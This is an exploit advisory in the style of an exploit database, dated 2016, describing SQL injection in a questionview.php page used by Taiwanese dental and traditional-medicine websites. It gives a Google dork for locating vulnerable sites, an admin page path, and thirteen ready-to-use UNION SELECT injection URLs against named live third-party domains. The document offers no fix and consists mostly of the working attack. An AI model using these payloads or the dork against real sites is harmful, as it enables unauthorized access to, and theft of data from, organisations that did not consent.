######################
# Exploit Title : Dental SQL Injection Vulnerability
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://dental.com.tw/
# Google Dork : intext:"本網站提供健康知識資訊,禁止任何網際網路服務業者轉錄網站資訊內容" inurl:questionview.php?
# Date: 06.01.2016
# Tested On : Win 10 / Google Chrome / Mozilla Firefox
#
######################
# adminpage= target/admin.php
#
# demos :
# http://www.charming.dental.com.tw/questionview.php?ID=-55750%27+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18--%20-
# http://abc.tcm.tw/questionview.php?ID=-40527+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18--%20-
# http://fullhealth.tcm.tw/questionview.php?ID=-22858+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18--%20-
# http://www.starsdental.com.tw/questionview.php?ID=-33517%27+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18--%20-
# http://wehealth.tmed.tw/questionview.php?ID=-26650+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18--%20-
# http://gxc.tcm.tw/questionview.php?ID=-73958%27+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18--%20-
# http://www.tuina.org.tw/questionview.php?ID=-1421+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18--%20-
# http://5151.tw/questionview.php?id=-40090+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18--%20-
# http://www.tcm.tw/questionview.php?id=-40090+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18
# http://tmed.tw/questionview.php?id=-13593+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18--%20-
# http://dental.com.tw/questionview.php?id=-39887+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18--%20-
# http://ktop2.tcm.tw/questionview.php?ID=-39253%27+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18--%20-
# http://www.herfull.com.tw/questionview.php?ID=-10928+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18--%20-
######################
# discovered by : modiret
######################